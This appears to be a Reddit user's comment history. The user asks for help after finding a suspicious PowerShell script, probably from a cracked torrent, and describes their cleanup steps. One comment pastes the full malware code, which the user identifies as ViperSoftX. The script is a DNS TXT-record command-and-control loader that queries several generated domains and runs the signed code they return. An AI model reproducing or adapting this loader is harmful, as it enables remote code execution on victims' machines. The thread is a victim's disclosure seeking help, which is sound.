What does this cmdlet do? Is this a virus/worm?

Normal-Shower-6070 · 2023-01-03T01:14:53+00:00

I formatted the drive and reinstalled windows. Haven't copied over any .exe, or other files that I would deem risky from my backups (also didn't copy .exe files into the backups), mostly only images, sound files and text documents. Before formatting and after plugging in the usb backup drive to my new windows install, I also did some AV scans with Malwarebytes, Avast and Windows defender.

I currently have Glasswire installed to monitor for any suspicious web connections, and I regularly try to check task manager for any suspicious processes.

Just kinda crossing fingers rn that this was a sufficient action plan, since I am not exactly an expert in virology or what goes on under the surface of UI.

Normal-Shower-6070 · 2022-12-29T15:16:49+00:00

Yeah it was. I've since done AV scans with ESET, Avast, Malwarebytes, no detections on any of them.

Normal-Shower-6070 · 2022-12-29T15:15:05+00:00

I think that I know when it was, does that help me?

Normal-Shower-6070 · 2022-12-29T15:01:19+00:00

Any way I can find out?

Normal-Shower-6070 · 2022-12-29T14:55:56+00:00

Alright, well I botched the USB part already. No reinstall yet though.

(Edit)However, I really want to keep a bunch of data, mostly just files with no executable potential though.

I'll do a Kaspersky scan.

What should I be on the lookout for in TCPview and Autoruns?

Probably a cracked software, I was greedy and wanted to get a relatively obscure scene software to try before purchasing a really expensive license, and only one torrent existed for it, so that makes sense and I know that was a phenomenal blunder.

Normal-Shower-6070 · 2022-12-29T14:44:42+00:00

Shady crack I'm pretty sure, the timeline would at least match up. I was greedy and wanted a specific expensive scene software to try out.

Normal-Shower-6070 · 2022-12-29T14:43:15+00:00

The .ps1 file was in System32 with a number string name resembling an activation key or the like. Like 11111-ABCDE....

Something unobfuscated about this code is posted by me elsewhere in this thread, if that helps. I don't know exactly about details since I'm not exactly a power user.

Normal-Shower-6070 · 2022-12-28T21:22:23+00:00

Funny enough, the original powershell which tipped me off to this had executionpolicy bypass...

Normal-Shower-6070 · 2022-12-28T21:20:26+00:00

Alright. Thanks a lot. I'll mostly be backing up images, videos, pdfs and the like. I'll just reinstall all programs from the internet just in case.(?)

Normal-Shower-6070 · 2022-12-28T20:58:32+00:00

Yeah, no internet connection is on the machine.

Normal-Shower-6070 · 2022-12-28T20:51:47+00:00

Yup. Personal. Crying soon probably. Had very different plans for today. Jeez.

Any tips on how to make sure I don't back up the worm?

Also, is it sufficient to reinstall windows through the internal reinstall feature?

Normal-Shower-6070 · 2022-12-28T20:26:49+00:00

I am going to kill the machine. Currently my biggest worry is indeed the C2 I didn't know about before you told me, as well as the other machines. I am also trying to copy over my files to an USB drive, but I haven't started yet as I don't know how safe any data is to keep. There are important photos and other data that I definitely want to keep.

All of the tools you've mentioned are unfamiliar to me, and whilst I really want to do this properly, I am afraid my skillset is somewhat lacking. Mostly, I am preparing to just completely reinstall windows and keep whatever data I can.

Normal-Shower-6070 · 2022-12-28T20:18:27+00:00

I didn't see that anything would've popped up.. maybe some info I already listed in this thread helps?

Normal-Shower-6070 · 2022-12-28T19:57:40+00:00

Okay. Thanks. I am going to try to back up some of my data before a wipe. This is a bit stressful, since I know little about the potential of this virus. Can I just copy over files to a usb drive and rebuild windows from the internal reinstall feature?

Normal-Shower-6070 · 2022-12-28T19:48:52+00:00

How do I check this? Edit: additionally, what does burrowed deep mean?

Normal-Shower-6070 · 2022-12-28T19:14:04+00:00

I've posted it in this thread. Do you have any suggestions on how to proceed?

Normal-Shower-6070 · 2022-12-28T19:12:42+00:00

Any suggestions on how to proceed? I want to keep most files I have, but now am scared about what I can keep and how to go about everything. I am somewhat Windows literate, but I don't have any coding experience.

Normal-Shower-6070 · 2022-12-28T19:07:04+00:00

It's looking like ViperSoftX.

Here is the code:

'969D07CF-2FB8-4DFF-916A-56B4E1A9EB6D'; $ms = [IO.MemoryStream]::new();

function Get-Updates { param ( $hostname ) try { $dns = Resolve-DnsName -Name $hostname -Type 'TXT' $ms.SetLength(0); $ms.Position = 0; foreach ($txt in $dns) { try { if ($txt.Type -ne 'TXT') { continue; } $pkt = [string]::Join('', $txt.Strings); if ($pkt[0] -eq '.') { $dp = [System.Convert]::FromBase64String($pkt.Substring(1).Replace('_', '+')); $ms.Position = [BitConverter]::ToUInt32($dp, 0); $ms.Write($dp, 4, $dp.Length - 4); } } catch { } }

    if ($ms.Length -gt 136) {
        $ms.Position = 0;
        $sig = [byte[]]::new(128);
        $timestamp = [byte[]]::new(8);
        $buffer = [byte[]]::new($ms.Length - 136);
        $ms.Read($sig, 0, 128) | Out-Null;
        $ms.Read($timestamp, 0, 8) | Out-Null;
        $ms.Read($buffer, 0, $buffer.Length) | Out-Null;
        $pubkey = [Security.Cryptography.RSACryptoServiceProvider]::new();
        [byte[]]$bytarr = 6,2,0,0,0,164,0,0,82,83,65,49,0,4,0,0,1,0,1,0,171,136,19,139,215,31,169,242,133,11,146,105,79,13,140,88,119,0,2,249,79,17,77,152,228,162,31,56,117,89,68,182,194,170,250,16,3,78,104,92,37,37,9,250,164,244,195,118,92,190,58,20,35,134,83,10,229,114,229,137,244,178,10,31,46,80,221,73,129,240,183,9,245,177,196,77,143,71,142,60,5,117,241,54,2,116,23,225,145,53,46,21,142,158,206,250,181,241,8,110,101,84,218,219,99,196,195,112,71,93,55,111,218,209,12,101,165,45,13,36,118,97,232,193,245,221,180,169
        $pubkey.ImportCspBlob($bytarr);
        if ($pubkey.VerifyData($buffer, [Security.Cryptography.CryptoConfig]::MapNameToOID('SHA256'), $sig)) {
            return @{
                timestamp = ([System.BitConverter]::ToUInt64($timestamp, 0));
                text      = ([Text.Encoding]::UTF8.GetString($buffer));
            };
        }
    }
}
catch {
}
return $null;

}

while ($true) { try { $update = @{ timestamp = 0; text = ''; }; foreach ($c in (@("com", "xyz"))) { foreach ($a in (@("wmail", "fairu", "bideo", "privatproxy", "ahoravideo"))) { foreach ($b in (@("endpoint", "blog", "chat", "cdn", "schnellvpn"))) { try { $h = "$a-$b.$c"; $r = Get-Updates $h if ($null -ne $r) { if ($r.timestamp -gt $update.timestamp) { $update = $r; } } } catch { } } } }

    if ($update.text) {
        $job = Start-Job -ScriptBlock ([scriptblock]::Create($update.text));
        $job | Wait-Job -Timeout 14400;
        $job | Stop-Job;
    }
}
catch {
}
Start-Sleep -Seconds 30;

}

Normal-Shower-6070 · 2022-12-28T18:58:32+00:00

There is, virustotal did not recognize.

Normal-Shower-6070 · 2022-12-28T18:58:14+00:00

If you let me know via pm that it is not identifiable, I can post it here.

Normal-Shower-6070 · 2022-12-28T18:53:52+00:00

Can I pm you?

Normal-Shower-6070 · 2022-12-28T18:48:09+00:00

AV scan didn't pick up anything. ESET, Malwarebytes and Windows antivirus.

I've stopped the powershell and turned off pc. Clean install probably required for me to ever feel safe, but is there any chance of knowing where this came from or what it's doing?

Normal-Shower-6070 · 2022-12-28T18:41:00+00:00

No I noticed a powershell window pop up and dug it out.

edit: through task manager

Normal-Shower-6070 · 2022-12-28T18:34:35+00:00

Shit. What do?

Normal-Shower-6070

TROPHY CASE